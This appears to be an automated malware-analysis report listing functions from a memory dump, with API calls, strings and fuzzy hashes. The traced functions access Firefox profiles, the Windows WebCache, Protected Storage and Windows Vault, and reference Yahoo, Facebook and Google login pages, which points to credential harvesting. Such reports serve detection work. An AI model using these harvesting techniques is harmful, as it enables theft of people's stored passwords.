memset.MSVCRT ref: 0040FC85
??2@YAPAXI@Z.MSVCRT ref: 0040FCBB
??2@YAPAXI@Z.MSVCRT ref: 0040FCF9
DeleteObject.GDI32(?), ref: 0040FD36
GetModuleHandleW.KERNEL32(00000000), ref: 0040FD7E
LoadIconW.USER32(00000000,00000065), ref: 0040FD87

Memory Dump Source

Source File: 00000006.00000002.405206241.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: ??2@$DeleteHandleIconLoadModuleObjectmemset
String ID:
API String ID: 3532479477-0
Opcode ID: 14c3c2aa7062e08bf63dc7d5d281a39e77aead53937f861c87ecd8ed2eee7028
Instruction ID: 6b7a5e441d588d9bc54ea64e01ff161f986e35cd5d296fb942180f783725d529
Opcode Fuzzy Hash: 14c3c2aa7062e08bf63dc7d5d281a39e77aead53937f861c87ecd8ed2eee7028
Instruction Fuzzy Hash: EA315EB19013888FDB30EF668C896CAB6E9BF45314F00863FE84DDB641DBB946448B59

Uniqueness

Uniqueness Score: -1.00%

Function 00410C87, Relevance: 9.1, APIs: 4, Strings: 2, Instructions: 57COMMON

Download Yara Rule

APIs

memset.MSVCRT ref: 00410CA3
memset.MSVCRT ref: 00410CB8

Part of subcall function 00414558: SHGetSpecialFolderPathW.SHELL32(00000000,00000000,0000001A,00000000), ref: 00414592

Part of subcall function 00407DD1: wcslen.MSVCRT ref: 00407DD2
Part of subcall function 00407DD1: wcscat.MSVCRT ref: 00407DEA

wcscat.MSVCRT ref: 00410CE1

Part of subcall function 00414558: memset.MSVCRT ref: 004145B1
Part of subcall function 00414558: RegCloseKey.ADVAPI32(?), ref: 00414618
Part of subcall function 00414558: wcscpy.MSVCRT ref: 00414626

wcscat.MSVCRT ref: 00410D0A

Strings

Mozilla\Profiles, xrefs: 00410CDB
Mozilla\Firefox\Profiles, xrefs: 00410D04

Memory Dump Source

Source File: 00000006.00000002.405206241.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: memsetwcscat$CloseFolderPathSpecialwcscpywcslen
String ID: Mozilla\Firefox\Profiles$Mozilla\Profiles
API String ID: 1534475566-1174173950
Opcode ID: 86b2fee5573bc67bc9087b08d08cdc2ad0ccfef1d6009a232684216d2b924b41
Instruction ID: 1b820a25e8b0a88a2df896ef0368420f7b9c24777a221978b2b2a3cd549cec0e
Opcode Fuzzy Hash: 86b2fee5573bc67bc9087b08d08cdc2ad0ccfef1d6009a232684216d2b924b41
Instruction Fuzzy Hash: 860152B294031C76EB20AB668C86EDB762C9F85358F0141AAB618B7142D97C9DC44AAD

Uniqueness

Uniqueness Score: -1.00%

Function 004034E3, Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 114COMMON

Download Yara Rule

APIs

Part of subcall function 0040B1BF: free.MSVCRT(00000000,00410160,/deleteregkey,/savelangfile,?,?,?,?,00000002,?,004448C6,00000000,?,0000000A), ref: 0040B1C6

Part of subcall function 00411E4C: memset.MSVCRT ref: 00411EC2
Part of subcall function 00411E4C: wcsrchr.MSVCRT ref: 00411EDB

Part of subcall function 00411BB2: SetCurrentDirectoryW.KERNEL32(?,?,?,00403557,?), ref: 00411BFF

memset.MSVCRT ref: 004035BC
memcpy.MSVCRT ref: 004035D0
wcscmp.MSVCRT ref: 004035F8
_wcsicmp.MSVCRT ref: 0040362F

Strings

, xrefs: 0040350C

Memory Dump Source

Source File: 00000006.00000002.405206241.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: memset$CurrentDirectory_wcsicmpfreememcpywcscmpwcsrchr
String ID:
API String ID: 1763786148-3916222277
Opcode ID: 09aee775218a621ff1fef0c9153cb1cfdc5fccf2e7c31d726b2849875dfa8a1e
Instruction ID: bd143a35ad5b1b32f57d6bfe9876d60f7f1e4d0a05a181755c1d953110edcb1c
Opcode Fuzzy Hash: 09aee775218a621ff1fef0c9153cb1cfdc5fccf2e7c31d726b2849875dfa8a1e
Instruction Fuzzy Hash: 24412A71D40229AADF20EFA5CC45ADEB7B8AF44318F1044ABE508B3241DB789B858F59

Uniqueness

Uniqueness Score: -1.00%

Function 00414558, Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 77registryCOMMON

Download Yara Rule

APIs

Part of subcall function 004144AB: LoadLibraryW.KERNEL32(shell32.dll,0040FF7C,00000000,?,00000002,?,004448C6,00000000,?,0000000A), ref: 004144B9
Part of subcall function 004144AB: GetProcAddress.KERNEL32(00000000,SHGetSpecialFolderPathW), ref: 004144CE

SHGetSpecialFolderPathW.SHELL32(00000000,00000000,0000001A,00000000), ref: 00414592
memset.MSVCRT ref: 004145B1
RegCloseKey.ADVAPI32(?), ref: 00414618
wcscpy.MSVCRT ref: 00414626

Part of subcall function 004083A1: GetVersionExW.KERNEL32(00452E28,0000001A,00414579), ref: 004083BB

Strings

Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders, xrefs: 004145CC, 004145DC

Memory Dump Source

Source File: 00000006.00000002.405206241.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: AddressCloseFolderLibraryLoadPathProcSpecialVersionmemsetwcscpy
String ID: Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders
API String ID: 2699640517-2036018995
Opcode ID: 1f48f7e9f744942bfd9fbef0cf09dbb4d3108d1291aa30ec74452a86fee1161f
Instruction ID: e12ff53167afe07261100608862af2d586d512a8c684a17975878dc8bda8b34c
Opcode Fuzzy Hash: 1f48f7e9f744942bfd9fbef0cf09dbb4d3108d1291aa30ec74452a86fee1161f
Instruction Fuzzy Hash: 42112B71800214BBEF20A759CC4EAEFB3BDDB85754F6100A7F914A2151E62C5FC5869E

Uniqueness

Uniqueness Score: -1.00%

Function 00413CFB, Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 43COMMON

Download Yara Rule

APIs

wcschr.MSVCRT ref: 00413D15
_snwprintf.MSVCRT ref: 00413D3A
WritePrivateProfileStringW.KERNEL32(?,?,?,0044BCA0), ref: 00413D58
GetPrivateProfileStringW.KERNEL32 ref: 00413D70

Strings

"%s", xrefs: 00413D29

Memory Dump Source

Source File: 00000006.00000002.405206241.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: PrivateProfileString$Write_snwprintfwcschr
String ID: "%s"
API String ID: 1343145685-3297466227
Opcode ID: 02edbd4849e356a2dd53856aa56349abaee77aee134cad8029ffbeba199e4c17
Instruction ID: 73e04fdb7293ad0563e201354ce1ff8293903967f03a71563bfd8de655adbfaf
Opcode Fuzzy Hash: 02edbd4849e356a2dd53856aa56349abaee77aee134cad8029ffbeba199e4c17
Instruction Fuzzy Hash: 2401AD3240521EBBEF229F91EC45FDB3B6AFF04745F14806ABA1854062D779C660DB98

Uniqueness

Uniqueness Score: -1.00%

Function 0041337C, Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 27libraryloadertimeCOMMON

Download Yara Rule

APIs

GetModuleHandleW.KERNEL32(kernel32.dll,?,0041357A,00000000,?,?,?,?,00000000,?), ref: 0041338D
GetProcAddress.KERNEL32(00000000,GetProcessTimes), ref: 004133A7
GetProcessTimes.KERNELBASE(00000000,?,?,?,?,?,0041357A,00000000,?,?,?,?,00000000,?), ref: 004133CA

Strings

GetProcessTimes, xrefs: 00413397
kernel32.dll, xrefs: 00413388

Memory Dump Source

Source File: 00000006.00000002.405206241.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: AddressHandleModuleProcProcessTimes
String ID: GetProcessTimes$kernel32.dll
API String ID: 1714573020-3385500049
Opcode ID: 309a91ae3d39bfd2be00db52258639a55574cbf10b15d42bee79424e3042c4b9
Instruction ID: da68f8d270a38a3c71bb0a1d73356e5427966c5ec0fa45e2ea30989c2ad8b33c
Opcode Fuzzy Hash: 309a91ae3d39bfd2be00db52258639a55574cbf10b15d42bee79424e3042c4b9
Instruction Fuzzy Hash: 41F01535140208AFEF108F91EC44B9A7BA9AB08B86F404026FE18C1162CB75DAA0DB5C

Uniqueness

Uniqueness Score: -1.00%

Function 0041EAC1, Relevance: 7.7, APIs: 3, Strings: 2, Instructions: 165COMMON

Download Yara Rule

APIs

memcmp.MSVCRT ref: 0041EB1E
memcmp.MSVCRT ref: 0041EB49
memcmp.MSVCRT ref: 0041EBB5

Strings

@ , xrefs: 0041EBAF
SQLite format 3, xrefs: 0041EB3C

Memory Dump Source

Source File: 00000006.00000002.405206241.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: memcmp
String ID: @ $SQLite format 3
API String ID: 1475443563-3708268960
Opcode ID: 9e57e3796a850d6adbd0e3ed440c1139a18f0d6e707d690eb2e825c2f4dd1757
Instruction ID: 378f5b88a64b421c164fea27eec5394a6c1f6cf5fd0cfe57e22cb817cc3972c5
Opcode Fuzzy Hash: 9e57e3796a850d6adbd0e3ed440c1139a18f0d6e707d690eb2e825c2f4dd1757
Instruction Fuzzy Hash: 4E51C1B59002059BDF14DF6AC8817DAB7F4AF54314F15019BEC04EB34AE778EA85CB98

Uniqueness

Uniqueness Score: -1.00%

Function 00409EB7, Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 87fileCOMMON

Download Yara Rule

APIs

Part of subcall function 00409A23: OpenProcess.KERNEL32(00000040,00000000,?,00000104,00000000,?,00000104,00000000,00000000,00000104,Microsoft\Windows\WebCache\WebCacheV01.dat), ref: 00409A98
Part of subcall function 00409A23: GetCurrentProcess.KERNEL32(00000000,80000000,00000000,00000000), ref: 00409AB7
Part of subcall function 00409A23: DuplicateHandle.KERNEL32(00000000,00000104,00000000), ref: 00409AC4
Part of subcall function 00409A23: GetFileSize.KERNEL32(00000000,00000000), ref: 00409AD9
Part of subcall function 00409A23: CreateFileMappingW.KERNEL32(00000000,00000000,00000002,00000000,00000000,00000000), ref: 00409B03
Part of subcall function 00409A23: MapViewOfFile.KERNEL32(00000000,00000004,00000000,00000000,00000104), ref: 00409B18
Part of subcall function 00409A23: WriteFile.KERNEL32(?,00000000,00000104,0040A0FE,00000000), ref: 00409B33
Part of subcall function 00409A23: UnmapViewOfFile.KERNEL32(00000000), ref: 00409B3A
Part of subcall function 00409A23: CloseHandle.KERNEL32(?), ref: 00409B43

CloseHandle.KERNEL32(000000FF,000000FF,00000000,?,0040A0FE,000000FF,00000000,00000104,Microsoft\Windows\WebCache\WebCacheV01.dat), ref: 00409F87

Part of subcall function 00409CB0: memset.MSVCRT ref: 00409D85
Part of subcall function 00409CB0: wcschr.MSVCRT ref: 00409DBD
Part of subcall function 00409CB0: memcpy.MSVCRT ref: 00409DF1

DeleteFileW.KERNEL32(?,?,0040A0FE,000000FF,00000000,00000104,Microsoft\Windows\WebCache\WebCacheV01.dat), ref: 00409FA8
CloseHandle.KERNEL32(000000FF,?,0040A0FE,000000FF,00000000,00000104,Microsoft\Windows\WebCache\WebCacheV01.dat), ref: 00409FCF

Part of subcall function 00409B7A: memset.MSVCRT ref: 00409BC2
Part of subcall function 00409B7A: _snwprintf.MSVCRT ref: 00409C5C
Part of subcall function 00409B7A: free.MSVCRT(000000FF,?,000000FF,00000000,00000104,747DF560), ref: 00409C90

Strings

Microsoft\Windows\WebCache\WebCacheV01.dat, xrefs: 00409EC7

Memory Dump Source

Source File: 00000006.00000002.405206241.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: File$Handle$Close$ProcessViewmemset$CreateCurrentDeleteDuplicateMappingOpenSizeUnmapWrite_snwprintffreememcpywcschr
String ID: Microsoft\Windows\WebCache\WebCacheV01.dat
API String ID: 1979745280-1514811420
Opcode ID: eeb481b1dff4e993c2893e9f0026ff803c1a702ff2030c6be45b7232c18bb5a2
Instruction ID: 3f51e9d3f4722dee63ca69fa5b044a2e48b650b6030bfe0f748ec1b1a5da80f7
Opcode Fuzzy Hash: eeb481b1dff4e993c2893e9f0026ff803c1a702ff2030c6be45b7232c18bb5a2
Instruction Fuzzy Hash: 65311CB1C006589BCF60DFA5CD855CDF7B8AF40314F1002AB9519F31A2DB755E858F58

Uniqueness

Uniqueness Score: -1.00%

Function 0040E903, Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 68COMMON

Download Yara Rule

APIs

_wcsicmp.MSVCRT ref: 0040E924
qsort.MSVCRT ref: 0040E9CE

Strings

/sort, xrefs: 0040E91F
/nosort, xrefs: 0040E984

Memory Dump Source

Source File: 00000006.00000002.405206241.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: _wcsicmpqsort
String ID: /nosort$/sort
API String ID: 1579243037-1578091866
Opcode ID: c14f26a3bd4bd4d31eab25ef7948187d43d10632211a5499f155237dcc845ca2
Instruction ID: da88191f08b8b868428b3ed71d9c82d207ce8b6ace4e6628c3e2187065429015
Opcode Fuzzy Hash: c14f26a3bd4bd4d31eab25ef7948187d43d10632211a5499f155237dcc845ca2
Instruction Fuzzy Hash: 7521F271700502AFD714FF36C981A5AB3A9FF95304B01097FE459A72D2CB7ABC218B99

Uniqueness

Uniqueness Score: -1.00%

Function 0040ADD0, Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 34libraryloaderCOMMON

Download Yara Rule

APIs

Part of subcall function 00413ACB: FreeLibrary.KERNELBASE(?,0040ADDC), ref: 00413AD7

LoadLibraryW.KERNELBASE(pstorec.dll), ref: 0040ADE1
GetProcAddress.KERNEL32(00000000,PStoreCreateInstance), ref: 0040ADF4

Strings

PStoreCreateInstance, xrefs: 0040ADEE
pstorec.dll, xrefs: 0040ADDC

Memory Dump Source

Source File: 00000006.00000002.405206241.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: Library$AddressFreeLoadProc
String ID: PStoreCreateInstance$pstorec.dll
API String ID: 145871493-2881415372
Opcode ID: fdc831568e2784af9de8c5a906fe078fe08317c6051ed8042a8c169ffd09e9de
Instruction ID: 165486c3e6602412b12b5041488cd1e6311a4fd56e7abe132b6c53b1702dbca2
Opcode Fuzzy Hash: fdc831568e2784af9de8c5a906fe078fe08317c6051ed8042a8c169ffd09e9de
Instruction Fuzzy Hash: D8F0E2302807125BEB206F76DC06B9B32D8AF44B4AF10C43EA052D55C1EBBCD4808B9D

Uniqueness

Uniqueness Score: -1.00%

Function 004141E0, Relevance: 6.1, APIs: 4, Instructions: 55COMMON

Download Yara Rule

APIs

FindResourceW.KERNELBASE(?,?,?), ref: 004141ED
SizeofResource.KERNEL32(?,00000000), ref: 004141FE
LoadResource.KERNEL32(?,00000000), ref: 0041420E
LockResource.KERNEL32(00000000), ref: 00414219

Memory Dump Source

Source File: 00000006.00000002.405206241.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: Resource$FindLoadLockSizeof
String ID:
API String ID: 3473537107-0
Opcode ID: ec51cf45041cf25647cccbc885ed45c86f25aef72003178a0d679bc8b0aad2a7
Instruction ID: 4db2b1a63d72691fd362fce079069d1f86e41d88e51d490a39d61a138898f27d
Opcode Fuzzy Hash: ec51cf45041cf25647cccbc885ed45c86f25aef72003178a0d679bc8b0aad2a7
Instruction Fuzzy Hash: A8019636A002156B8F155FA5DD4999F7FAAFFC67D0708803AF915CA221DB70C882C688

Uniqueness

Uniqueness Score: -1.00%

Function 00444E7A, Relevance: 6.0, APIs: 4, Instructions: 25COMMON

Download Yara Rule

APIs

??3@YAXPAX@Z.MSVCRT ref: 00444E84
??3@YAXPAX@Z.MSVCRT ref: 00444E94
??3@YAXPAX@Z.MSVCRT ref: 00444EA4
??3@YAXPAX@Z.MSVCRT ref: 00444EB4

Memory Dump Source

Source File: 00000006.00000002.405206241.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: ??3@
String ID:
API String ID: 613200358-0
Opcode ID: 6dc2ae8407accaec33e914c995c073318a836f74cf280773562707ce9086f27d
Instruction ID: 83d98c8e739894f4f11ae52403c2f1a0732df397c2cb69f7507dcdbda06e161a
Opcode Fuzzy Hash: 6dc2ae8407accaec33e914c995c073318a836f74cf280773562707ce9086f27d
Instruction Fuzzy Hash: F7E04DA070030136BB20AFBAFD44B0323CC3A90793326482FB406D73D2EE2CE840A52C

Uniqueness

Uniqueness Score: -1.00%

Function 0043A0F8, Relevance: 5.5, APIs: 2, Strings: 1, Instructions: 967COMMON

Download Yara Rule

APIs

memset.MSVCRT ref: 0043A13B
memset.MSVCRT ref: 0043A4E4

Strings

only a single result allowed for a SELECT that is part of an expression, xrefs: 0043A1CA

Memory Dump Source

Source File: 00000006.00000002.405206241.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: memset
String ID: only a single result allowed for a SELECT that is part of an expression
API String ID: 2221118986-1725073988
Opcode ID: a02f6a0a02fcd16c7aa4dd96e86c2c528519a914f69e8e6aa23dcbcbdf6080a7
Instruction ID: e3eeb75a8af282f970fbf78469263b11f6465a284568bf7e48a5e115ce459d1a
Opcode Fuzzy Hash: a02f6a0a02fcd16c7aa4dd96e86c2c528519a914f69e8e6aa23dcbcbdf6080a7
Instruction Fuzzy Hash: F1828771A00208AFDF24DF69C881AAE7BA1FF08314F14411AFD559B3A2D77AEC51CB95

Uniqueness

Uniqueness Score: -1.00%

Function 0040B25F, Relevance: 5.1, APIs: 4, Instructions: 51COMMON

Download Yara Rule

APIs

??2@YAPAXI@Z.MSVCRT ref: 0040B299
??2@YAPAXI@Z.MSVCRT ref: 0040B2B7
??2@YAPAXI@Z.MSVCRT ref: 0040B2D5
??2@YAPAXI@Z.MSVCRT ref: 0040B2F3

Memory Dump Source

Source File: 00000006.00000002.405206241.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: ??2@
String ID:
API String ID: 1033339047-0
Opcode ID: 7383806280aca4e1821e19982c5cfbbe854b0cbcf0857156c862d8a82c6a6e7a
Instruction ID: 41d6ca53bbc25777d15e7d44d7af272a9a829ad4135043ac9a1f5f7c0c786f2e
Opcode Fuzzy Hash: 7383806280aca4e1821e19982c5cfbbe854b0cbcf0857156c862d8a82c6a6e7a
Instruction Fuzzy Hash: ED0112F12023007FEB69DF38ED1772A66949B95393F00413FA506CD2F6EA79D5449B08

Uniqueness

Uniqueness Score: -1.00%

Function 004444B7, Relevance: 4.6, APIs: 1, Strings: 2, Instructions: 121COMMON

Download Yara Rule

APIs

Part of subcall function 004443B0: LoadLibraryW.KERNELBASE(vaultcli.dll,?,00000000), ref: 004443BD
Part of subcall function 004443B0: GetProcAddress.KERNEL32(00000000,VaultOpenVault), ref: 004443D2
Part of subcall function 004443B0: GetProcAddress.KERNEL32(00000000,VaultCloseVault), ref: 004443DF
Part of subcall function 004443B0: GetProcAddress.KERNEL32(00000000,VaultEnumerateItems), ref: 004443EC
Part of subcall function 004443B0: GetProcAddress.KERNEL32(00000000,VaultFree), ref: 004443F9
Part of subcall function 004443B0: GetProcAddress.KERNEL32(00000000,VaultGetInformation), ref: 00444406
Part of subcall function 004443B0: GetProcAddress.KERNEL32(00000000,VaultGetItem), ref: 00444414
Part of subcall function 004443B0: GetProcAddress.KERNEL32(00000000,VaultGetItem), ref: 0044441D

memcmp.MSVCRT ref: 0044455D

Strings

$, xrefs: 00444531
8, xrefs: 00444523

Memory Dump Source

Source File: 00000006.00000002.405206241.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: AddressProc$LibraryLoadmemcmp
String ID: $$8
API String ID: 2708812716-435121686
Opcode ID: 201099f9feb607c4c8b0fa66378feea82f4e3e51204f541575a2dd3d377ec3c8
Instruction ID: 4b210d59022fde833576912f2e87238d6fd1d6b03e73e285368f71a5ac649bda
Opcode Fuzzy Hash: 201099f9feb607c4c8b0fa66378feea82f4e3e51204f541575a2dd3d377ec3c8
Instruction Fuzzy Hash: 73411171E00609ABEF10DF95C981BAFB7F4AF88714F11055AE915B3341DB78AE448BA4

Uniqueness

Uniqueness Score: -1.00%

Function 0040A7DA, Relevance: 4.6, APIs: 2, Strings: 1, Instructions: 111COMMON

Download Yara Rule

APIs

Part of subcall function 00403C2A: LoadLibraryW.KERNEL32(advapi32.dll,?,0040A9C2,?,https://login.yahoo.com/config/login,00000000,http://www.facebook.com/,00000000,https://www.google.com/accounts/servicelogin,00000000,?,00000000,?,00411E75,?,?), ref: 00403C35
Part of subcall function 00403C2A: GetProcAddress.KERNEL32(00000000,CryptAcquireContextA), ref: 00403C49
Part of subcall function 00403C2A: GetProcAddress.KERNEL32(?,CryptReleaseContext), ref: 00403C55
Part of subcall function 00403C2A: GetProcAddress.KERNEL32(?,CryptCreateHash), ref: 00403C61
Part of subcall function 00403C2A: GetProcAddress.KERNEL32(?,CryptGetHashParam), ref: 00403C6D
Part of subcall function 00403C2A: GetProcAddress.KERNEL32(?,CryptHashData), ref: 00403C79
Part of subcall function 00403C2A: GetProcAddress.KERNEL32(?,CryptDestroyHash), ref: 00403C85

wcslen.MSVCRT ref: 0040A819
memset.MSVCRT ref: 0040A898

Strings

P5@, xrefs: 0040A850

Memory Dump Source

Source File: 00000006.00000002.405206241.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: AddressProc$LibraryLoadmemsetwcslen
String ID: P5@
API String ID: 1960736289-1192260740
Opcode ID: 20a957c6aa2ccba46100227cc7926e2e9aca7a542005eb85cce3c7ff41f048fe
Instruction ID: 9cce22c2db06112b06b017d7de527652cc15472bfd2168745658b7e1f8ccbd38
Opcode Fuzzy Hash: 20a957c6aa2ccba46100227cc7926e2e9aca7a542005eb85cce3c7ff41f048fe
Instruction Fuzzy Hash: CC31D272500208AFDF10EFA4CC85DEE77B9AF48304F15887AF505F7281D638AE198B66

Uniqueness

Uniqueness Score: -1.00%

Function 00418073, Relevance: 4.6, APIs: 3, Instructions: 79COMMON

Download Yara Rule

APIs

Part of subcall function 00417F9B: GetFullPathNameW.KERNEL32(00000000,00000000,00000000,00000000,00000000,?,00000000,00000000,?,00000000), ref: 00417FC7
Part of subcall function 00417F9B: malloc.MSVCRT ref: 00417FD2
Part of subcall function 00417F9B: free.MSVCRT(?), ref: 00417FE2

Part of subcall function 00416CB6: GetVersionExW.KERNEL32(?), ref: 00416CD9

GetDiskFreeSpaceW.KERNELBASE(00000000,?,00000200,?,?,?,00000000,?,00000000), ref: 004180ED
GetDiskFreeSpaceA.KERNEL32(00000000,?,00000200,?,?,?,00000000,?,00000000), ref: 00418115
free.MSVCRT(00000000,?,00000000,?,00000000), ref: 0041811E

Memory Dump Source

Source File: 00000006.00000002.405206241.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: DiskFreeSpacefree$FullNamePathVersionmalloc
String ID:
API String ID: 1355100292-0
Opcode ID: 8e76693c67f0b4aa2a9f0ce93b5e4d32a4f514a6f71b86ff027121c958f9ef7a
Instruction ID: 44f72dfadcd4ed0e6b0cb1466d7c09a20078aec04da8d2fdb22fffa922359726
Opcode Fuzzy Hash: 8e76693c67f0b4aa2a9f0ce93b5e4d32a4f514a6f71b86ff027121c958f9ef7a
Instruction Fuzzy Hash: 8A215076800118BEEB21ABA4CC449EF7BBCAF09344F1540ABE641D7211EB784EC587A9

Uniqueness

Uniqueness Score: -1.00%

Function 00416F08, Relevance: 4.5, APIs: 3, Instructions: 49fileCOMMON

Download Yara Rule

APIs

Part of subcall function 00416E8B: SetFilePointer.KERNELBASE(?,?,?,00000000), ref: 00416EAC
Part of subcall function 00416E8B: GetLastError.KERNEL32 ref: 00416EBD
Part of subcall function 00416E8B: GetLastError.KERNEL32 ref: 00416EC3

ReadFile.KERNELBASE(?,?,?,?,00000000), ref: 00416F38
GetLastError.KERNEL32 ref: 00416F42

Memory Dump Source

Source File: 00000006.00000002.405206241.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: ErrorLast$File$PointerRead
String ID:
API String ID: 839530781-0
Opcode ID: 3e8702d37d071127fc233bfbf67a625d2feb83188ba54958d653ceabaac702fa
Instruction ID: add61fd64035c303a46c69afbbac6c0b4560a134b5de48ff3df98cfac7bf87f9
Opcode Fuzzy Hash: 3e8702d37d071127fc233bfbf67a625d2feb83188ba54958d653ceabaac702fa
Instruction Fuzzy Hash: 2D01AD3A208208BBEB108F65EC45FEA3B6CEF053A4F114426F908C6250D724EC9186E9

Uniqueness

Uniqueness Score: -1.00%

Function 0040A37F, Relevance: 4.5, APIs: 1, Strings: 2, Instructions: 45COMMON

Download Yara Rule

Strings

*.*, xrefs: 0040A3AA
index.dat, xrefs: 0040A3E3

Memory Dump Source

Source File: 00000006.00000002.405206241.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: wcslen$FileFindFirst
String ID: *.*$index.dat
API String ID: 1858513025-2863569691
Opcode ID: 9238a7d079e1375fbfde003b790de4053d9ee43c5394c8ca1f03ef328d3985c3
Instruction ID: 18b6580ac0a830e75170eb0e1623f763ef95ee80692c464e75bb199377268105
Opcode Fuzzy Hash: 9238a7d079e1375fbfde003b790de4053d9ee43c5394c8ca1f03ef328d3985c3
Instruction Fuzzy Hash: 20016D7140526859EB20EA61DC42ADE726CAF04304F5001BBA818F21C2EB789F929F5A

Uniqueness

Uniqueness Score: -1.00%

Function 00416E8B, Relevance: 4.5, APIs: 3, Instructions: 30COMMON

Download Yara Rule

APIs

SetFilePointer.KERNELBASE(?,?,?,00000000), ref: 00416EAC
GetLastError.KERNEL32 ref: 00416EBD
GetLastError.KERNEL32 ref: 00416EC3

Memory Dump Source

Source File: 00000006.00000002.405206241.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: ErrorLast$FilePointer
String ID:
API String ID: 1156039329-0
Opcode ID: 850b182fd2585f694b2736305c6ca07a69ca9fa842c0c1da9be3e232dd73cee9
Instruction ID: 37b1e2f091545ca96408f8d6a34600ec4a403a46a608ba1f9fdc83bbdb8077e2
Opcode Fuzzy Hash: 850b182fd2585f694b2736305c6ca07a69ca9fa842c0c1da9be3e232dd73cee9
Instruction Fuzzy Hash: F4F06536914619BBCF009F74DC009EA7BE8EB05361B104726F832D62D1E731EE419A94

Uniqueness

Uniqueness Score: -1.00%

Function 004080AC, Relevance: 3.8, APIs: 3, Instructions: 38COMMON

Download Yara Rule

APIs

malloc.MSVCRT ref: 004080C8
memcpy.MSVCRT ref: 004080E0
free.MSVCRT(00000000,00000000,?,00408F0C,00000002,?,00000000,?,0040923F,00000000,?,00000000), ref: 004080E9

Memory Dump Source

Source File: 00000006.00000002.405206241.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: freemallocmemcpy
String ID:
API String ID: 3056473165-0
Opcode ID: b35ef3f807938d4c0a098e15bd5b29d1098e3b6b761d1f171dd30fe06938ab32
Instruction ID: 78eaf63d8c2f3f9895426ca65e1500e544e2a4a90d5a49d0f549448db46f5a47
Opcode Fuzzy Hash: b35ef3f807938d4c0a098e15bd5b29d1098e3b6b761d1f171dd30fe06938ab32
Instruction Fuzzy Hash: 50F0E2726052229FD718EE75BA8180BB39DAF85364712883FF444E3282DF3C9C44C7A8

Uniqueness

Uniqueness Score: -1.00%

Function 00436ADD, Relevance: 3.2, APIs: 1, Strings: 1, Instructions: 242COMMON

Download Yara Rule

Strings

d, xrefs: 00436C9D

Memory Dump Source

Source File: 00000006.00000002.405206241.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID:
String ID: d
API String ID: 0-2564639436
Opcode ID: 8f68736b9ba4cd7c518547f9ab017183f137d2356596a6fc2c566f3b6748bc1b
Instruction ID: fc4515617b89e60a19d50c15f4f69ae244da8edec6c232cce581781c6edd6396
Opcode Fuzzy Hash: 8f68736b9ba4cd7c518547f9ab017183f137d2356596a6fc2c566f3b6748bc1b
Instruction Fuzzy Hash: 5981B031608312AFCB10DF19D84165FBBE0EF88718F12992FF8949B251D778DA45CB9A

Uniqueness

Uniqueness Score: -1.00%

Function 0041E7EE, Relevance: 3.2, APIs: 1, Strings: 1, Instructions: 174COMMON

Download Yara Rule

APIs

memset.MSVCRT ref: 0041E89C

Strings

BINARY, xrefs: 0041E7FA

Memory Dump Source

Source File: 00000006.00000002.405206241.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: memset
String ID: BINARY
API String ID: 2221118986-907554435
Opcode ID: d19efc801e877f0ce795817df0e0cc72f0fc1a5f5a7d27e56dc3ca5837767e46
Instruction ID: 80603cce4df8086f4253f53369ac634731a2704b4a2dc635bb3c7b15e71801b6
Opcode Fuzzy Hash: d19efc801e877f0ce795817df0e0cc72f0fc1a5f5a7d27e56dc3ca5837767e46
Instruction Fuzzy Hash: B951AD75A043459FDB21DF2AC881BEA7BE4EF48350F14446AEC89CB341D738D980CBA9

Uniqueness

Uniqueness Score: -1.00%

Function 0040DD37, Relevance: 3.1, APIs: 2, Instructions: 140COMMON

Download Yara Rule

APIs

Part of subcall function 0040C513: ??2@YAPAXI@Z.MSVCRT ref: 0040C534
Part of subcall function 0040C513: ??3@YAXPAX@Z.MSVCRT ref: 0040C5FB

GetStdHandle.KERNEL32(000000F5,?,0040FF40,00000000,00000000,?,00000000,00000000,00000000), ref: 0040DD6C
FindCloseChangeNotification.KERNELBASE(00000000,?,0040FF40,00000000,00000000,?,00000000,00000000,00000000), ref: 0040DE90

